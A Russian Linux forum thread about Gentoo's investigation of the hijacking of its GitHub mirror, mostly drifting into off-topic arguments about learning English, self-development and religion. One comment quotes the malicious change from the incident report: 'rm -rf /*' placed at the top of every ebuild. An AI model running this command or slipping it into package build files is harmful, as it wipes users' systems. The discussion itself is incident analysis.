LINUX.ORG.RU

Результаты расследования инцидента с взломом зеркала Gentoo на GitHub

 , , ,


0

2

Команда Gentoo решила ситуацию с взломом организации Gentoo на GitHub и написала отчет, в котором собрана вся информация по произошедшему.

Также команда Gentoo выразила благодарность сообществу разработчиков и пользователей за поддержку во время инцидента.

Предыстория:

28 июня, где-то в районе 20:20 UTC, неизвестные заполучили контроль над организацией Gentoo на Github, модифицировали состояния репозиториев и страниц.

>>> Подробности

Deleted

Проверено: maxcom ()
Последнее исправление: maxcom (всего исправлений: 3)

Ответ на: комментарий от cvs-255

Я не выдвигал требований, как бэ...

anonymous
()
Ответ на: комментарий от FilosofeM

У красноглазых проблемы с логикой. Если железо мощное и топовое, то зачем компилировать?

У тебя-то проблем с логикой, понятно, нет. Других причин компилировать просто нет, только 1 процент.

Ну и эта.. Заходить в гентушный тред и орать что компиляют только дураки, это, по меньшей мере, невежливо. Выйди вон и хихикай там глядя на себя в зеркало какой ты умный

pihter ★★★★★
()
Ответ на: комментарий от anonymous

Ну все пропало. Я неправ. Английский в современном мире учить не нужно. Особенно в айти.

Французский - хорошо. Но учи ещё и вражеский, если хочешь понимать че вокруг как.

// ну, у кого там китайский? Налетай, я все одно предложу учить ещё и английский

pihter ★★★★★
()
Ответ на: комментарий от pihter

И русский мне не родной. Родной, русский, французский, английский, китайский. Язык средство общения, это как иметь пять средств передвижения в личном пользовании.

anonymous
()

nitial clones of these repositories during these time intervals will have malicious content
gentoo/systemd: (2018-06-28 21:07 - 2018-06-29 06:57)

Эпично...в зловред, зловред впихнули.

Odalist ★★★★★
()
Ответ на: комментарий от pihter

Ёлы палы, да ладно посоны хватит уж о переводах и англицком, предлогаю сменить тему.

Товарищ Ржевский, вы носки когда не будь меняете? Меняю но только на водку)))

anonymous
()
Ответ на: комментарий от WatchCat

Ты вообще ebuild'ы когда-нибудь писал? В первую строку он команды пихает.

Писал. В новостях упоминалось о том, что добавлено было именно «в первую» строку:

adds rm -rf /*& at the top of skel.ebuild

adds rm -rf /* at the top of every ebuild

Поэтому и спрашивал, «с чего бы вдруг с дисками пользователей что-то вдруг случилось?» Полагаю, что «at the top of ... *.ebuild» значит в первую строку, а не внутрь какой-либо функции.

P.S. pkg_setup() разве не внутри sandbox выполняется? То есть даже внутри него такая команда не должна что-то повредить в системе.

grem ★★★★★
()
Последнее исправление: grem (всего исправлений: 1)
Ответ на: комментарий от pihter

Обожаю ЛОР.
Тут столько незамутнённых шпециалистофф.
«Пешы на сишечке», лол.
У меня данные идут с оборудования.
Там гигабайты в сутки.
И это ещё местечковый лайт-вариант.

WatchCat ★★★★★
()
Ответ на: комментарий от WatchCat

«Пешы на сишечке»

Это шутка была, непрекрытая

Раз гигабайты данных в сутки и критично их потерять, то, по-моему, только сразу писать в N мест.

Ну и, эта, не будешь же ты систему на апгрейд ставить (пересобирать ли, не знаю как тут у вас гентушников) пока она у тебя в работе и данные пишет. Тем более важные.

А перед апгрейдом бекап — ну ты в курсе. Или ты каждый день апгрейдишь?

pihter ★★★★★
()
Ответ на: комментарий от anonymous

А причём тут гитхаб? Если человек использует небезопасный пароль, то не в сервисе проблема.

Ghostwolf ★★★★★
()
Ответ на: комментарий от anonymous

Ну не знаю, я читал только этот вариант)))

anonymous
()
Ответ на: комментарий от pihter

Простите в комментах чтоб вам перевели

Мне-то не нужно, сам как-нибудь. Я о том, что не следует требовать от других, обладать вашими навыками, да ещё так категорично.

Мода на языки приходит и уходит. Ещё позавчера это был немецкий, вчера - французский, сегодня - английский. А для тех, кто может смотреть в завтрашний день, возможно, уже пора учить китайский или, прости Господи, арабский.

ashot ★★★★
()
Ответ на: комментарий от WatchCat

Заодно можешь убедиться, что команда была добавлена именно до объявления функций, вокруг только комментарии. Для остальных можешь сам проверить.

grem ★★★★★
()
Ответ на: комментарий от pihter

английский на уровне прочитать текст

Я вообще не перевариваю английский текст, а тем более, когда его много. А тем более, когда надо самому составить предложение. Речь куда интереснее слушать, особенно если уже знаешь перевод. Хвала гуглу он избавляет от скучного текста.

anonymous
()
Ответ на: комментарий от grem

В новостях упоминалось о том, что добавлено было именно «в первую» строку:

Тогда извиняюсь. Невнимательно прочитал новость.

pkg_setup() разве не внутри sandbox выполняется?

Я конечно не экспериментировал с rm-rf, но такой код вполне нормально отработал:

pkg_pretend(){
        echo "hello world!" >> /root/test_ebuild
        return
}

Так что можно делать что угодно.

WatchCat ★★★★★
()
Ответ на: комментарий от grem

Ну значить какой-то скрипткидди подобрал пароль и «насрал в цветок»

WatchCat ★★★★★
()
Ответ на: комментарий от pihter

только сразу писать в N мест.

Вот только бюджет не резиновый.
Поэтому receiver->raid->tape.

WatchCat ★★★★★
()

Предлагаю опрос об уровне владения английским.

anonymous
()
Ответ на: комментарий от ashot

Я о том, что не следует требовать от других, обладать вашими навыками

не требую

да ещё так категорично.

Кто не занимается саморазвитием — корова. Такие люди могут только жрать, срать и стоять в стойле. Смотреть умными глазами, не в состоянии складывать слова в предложения, обучаться. Такое мое мнение. Это всего лишь мнение.

Мода на языки приходит и уходит. Ещё позавчера это был немецкий, вчера - французский, сегодня - английский.

Пара поколений проходит, пока мода меняется. Сегодня это, очевидно, английский. Хоть заспорьтесь.

Еще раз, я никому не навязываю мнение. Но на линуксовом формуме клянчить перевод двух предложений должно быть стыдно. Тем паче, что там школьного уровня.

pihter ★★★★★
()
Ответ на: комментарий от pihter

Кто не занимается саморазвитием — корова. Такие люди могут только жрать, срать и стоять в стойле. Смотреть умными глазами, не в состоянии складывать слова в предложения, обучаться. Такое мое мнение. Это всего лишь мнение.

Человек - это машина для выживания (да, я Докинза начитался). Как именно эта машина будет выживать - не суть важно. А вся эта волна саморазвивальщиков - просто еще один мем. Быть тупым неразвитым животным - это ок, если при этом удается выполнять одну единственно важную задачу - выживать.

anonymous
()
Ответ на: комментарий от Deleted

Аноним. Будем знакомы.

Вы у нас левак или верун? Ради чего хотите развиваться? Все мы просто сгнием в конечном итоге. Вопрос только в том, насколько этот момент возможно отодвинуть.

anonymous
()
Ответ на: комментарий от anonymous

Ради чего хотите развиваться?

Это, во-первых, приятно, а во-вторых - повышает качество жизни.

Deleted
()
Ответ на: комментарий от Deleted

А вы знакомы с биологической составляющей этого «приятно»? Просто химия, не более. Люди, прожившие жизнь приятно ничем не лучше тех, кто прожили её не приятно. В конечном итоге они все умерли.

anonymous
()
Ответ на: комментарий от anonymous

Просто химия, не более

Ну и что? Знание механики всяких наслаждений не мешает мне это самое наслаждение получать.

В конечном итоге они все умерли

Ну и что? Это только говорит о том, как тупо сидеть истерить о смерти, когда можно получать каеф от жизни.

Ну и да, саморазвитие (которое приводит к развитию человечества в целом) даёт хоть какой-то шанс, что мы достигнем существенного продления жизни или даже бессмертия.

Идиотия твоя даже не в том, что ты не хочешь развиваться (хотя и в этом тоже), а в твоей аргументации. По сути, ты ничем не отличаешься от веруна: того боженька создал своим рабом, и он ему служит, а тебя природа создала машиной для выживания, и ты ей служишь. Что для веруна, что для тебя, самосознание - совершенно лишняя сущность. Ведь религиозным ботом или биороботом быть так классно, бгг.

Deleted
()
Ответ на: комментарий от Deleted

Ну и что? Это только говорит о том, как тупо сидеть истерить о смерти, когда можно получать каеф от жизни.

Можно получать, а можно не получать. Ни один из этих вариантов не перевешивает. Memento mori.

а тебя природа создала машиной для выживания, и ты ей служишь

Меня природа не создавала. Я просто крайний результат алгоритма естественного отбора. Алгоритм не требует служения, поклонения или веры.

anonymous
()
Ответ на: комментарий от anonymous

Это норма. Планета не выдержит больше 10 лярдов приматов. Либо сами выпиляться, либо наступит техногенная катастрофа и выпилит лишних против их воли.

anonymous
()
Ответ на: комментарий от anonymous

Где расчёты?? Вместо своего мнения кидай ссылку на расчёты, рептилоид фигов.

anonymous
()
Ответ на: комментарий от anonymous

Ни один из этих вариантов не перевешивает

Ололол. Сходи в психушку посмотри на людей в депрессии, потом говори о бренности удовольствия XDD

Алгоритм не требует служения, поклонения или веры.

Тогда почему ты на него так наяриваешь и служишь ему?

Deleted
()
Ответ на: комментарий от Deleted

лучше про конпутеры говори, при всм уажении у тебя это лучше получается, чем о бреном, истинно ценном и т.д. хотя, если очень хочется то что же топи и дальше. но имха например кайфовать когда рядом кто то мрет это глупо, это минимум есть место подумать о причинах и прочем для дальнейшего предотвращения подобного вместо того что бы кайфовать. во вторых термины истерия, божинька и т.д. явно говорят о том что ты очредной антирилигиозный чел, которы готовы искоренять рилигию, потому что кто то аргументы им насовал в уши грамотно о бесполезности оной и в нужной последовательности и они и поверили, они протистуют в отношении религии, нно не пратистуют в отношшении системы, хотя большинство из них имеющих сеть ниразу не бывали в условиях в которых только к богу и остается возможность обращаться, но в таких условиях больше пооловины народа на планете живут, и им эта вера помогает справляться с давлением системы, а если ты скажешь что типа если они перестанут себя обнадеживать в вере в лучшее и перестанут молиться искренне то они востанут и прочее, сметут систему, то это в коре не правильный тезис, ничего они системе не сделают. потому единственно разумный путь им, большинству хоть каким то образом выживать в этом обществе это молиться, при чем молятся они о хорошем в основном, что говорит о том, что они хорошие люди, а вы на них кидаетесь. если что то и искоренять из нынешнего общества то религия и те же сигареты с алкоголем имха оказались бы где то в завершении списка, а на первом создать финансовое распределение ресурсов грамотное те бод, присечь приступность, ограничить балансы каждого гражданина енной суммой, введение новых форматов образования, свобода слова и тд

Deleted
()
Ответ на: комментарий от anonymous

Разве уже подтвердилось что билингвы умней?

А я такого не утверждаю. Умнее тот, кто лучше просчитывает последствия своих действий и действует соответствующие. А шарит лучше тот, кто лучше понимает как устроен мир и все его наполняющее. А понимает лучше тот, кто всю жизнь активно изучает этот самый мир.

pihter ★★★★★
()
Ответ на: комментарий от Deleted

кайфовать когда рядом кто то мрет это глупо

Глупо - болеть синдромом Иисуса и рыдать о детишках в Африке. Рыданиями ты никому лучше не сделаешь, только себе хуже.

Дальше не читал, больно смотреть на эту словесную кашу без пунктуации.

Deleted
()
Ответ на: комментарий от anonymous

Человек - это машина для выживания (да, я Докинза начитался). Как именно эта машина будет выживать - не суть важно. А вся эта волна саморазвивальщиков - просто еще один мем. Быть тупым неразвитым животным - это ок, если при этом удается выполнять одну единственно важную задачу - выживать

Отлично. Чем человек, как машина для выживания отличается от австралопитека, как машины для выживания? В первом приближении — только интеллектом.

Насколько мне известно, австралопитеки уже — того. А люди ещё нет.

Наука позволила накормить во много раз больше людей, позволила значительно увеличить продолжительность жизни и улучшить её качество. Помогает секта само развивал щитков выживанию вида и конкретного индивида?

pihter ★★★★★
()
Ответ на: комментарий от Deleted

мне от думания нормально, я и кайфовать умею, но когда я кайфую я осознаю тему и что если я кайфую щас потом понадобится думать, вообщем думать тоже надо а не только кайфовать :)

Deleted
()
Ответ на: комментарий от Deleted

когда я кайфую я осознаю тему и что если я кайфую щас потом понадобится думать

You're doing it wrong

Deleted
()
Ответ на: комментарий от Deleted

ладно тебе виднее, но имха человек это самый ценый ресурс кторый есть у чловечества на данныый момент и нна многие лионы лет вперед, и кафовать при прафукиваии ресурсов не делая выводы об этом и не фикся баги хотя бы в теории, которая при наличии возможности может всегда примениться на практике это не особо разумно, вот такой выво сделал я о тебе, точнее сварганил в каше.

Deleted
()
Ответ на: комментарий от Deleted

Религия помогает людям жить, люди всегда во что-то верили, это естественно. Но это не значит, что религия правильна по сути, просто самообман. Искоренять христианство, буддизм действительно не совсем разумно, совсем другая ситуация на востоке, где она настолько проросла, что стала тоталитарной. А это 40%, если не ошибаюсь.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.